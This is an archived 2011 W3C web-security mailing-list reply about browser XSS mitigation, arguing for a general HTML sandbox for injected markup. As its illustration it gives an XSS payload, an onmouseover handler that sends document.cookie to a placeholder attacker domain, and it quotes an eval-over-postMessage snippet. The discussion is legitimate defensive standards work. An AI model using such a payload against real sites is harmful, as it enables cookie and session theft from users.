Re: XSS mitigation in browsers from gaz Heyes on 2011-01-21 (public-web-security@w3.org from January 2011)

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 21 Jan 2011 09:03:30 +0000
To: "sird@rckc.at" <sird@rckc.at>
Cc: Michal Zalewski <lcamtuf@coredump.cx>, Sid Stamm <sid@mozilla.com>, Brandon Sterne <bsterne@mozilla.com>, Adam Barth <w3c@adambarth.com>, public-web-security@w3.org, Lucas Adamski <ladamski@mozilla.com>
Message-ID: <AANLkTimEd5jZJnPJ01kQOduiFMJ_dU2a-A6WeYQYsmb-@mail.gmail.com>

On 21 January 2011 00:06, sird@rckc.at <sird@rckc.at> wrote:

> @Gareth
> There is a native sandbox now.. iframe@sandbox can be used to sandbox
> scripts, just throw some:
>
>  onmessage=function(e){
>     e.source.postMessage(eval(e.data.code),e.origin);
>  }
>
> on an iframe and put it in a iframe@sandbox="allow-scripts", and you
> got a sandbox API :P
>

Yeah that's a iframe sandbox, I'm talking about a general HTML sandbox. If
you inject a DIV tag then you want to be able to sandbox it. Lets say for
instance I inject:
<div onmouseover="alert(1);new Image().src='//
evilsite.com/?'+document.cookie">test</div>  so in this instance the browser
detects the injection and then sandboxes the injection and the partial HTML
it encloses, so we get a "alert(1)", we get a new image but because it's
sandboxed the document.cookie isn't sent and the external domain isn't
called.

Received on Friday, 21 January 2011 09:04:03 UTC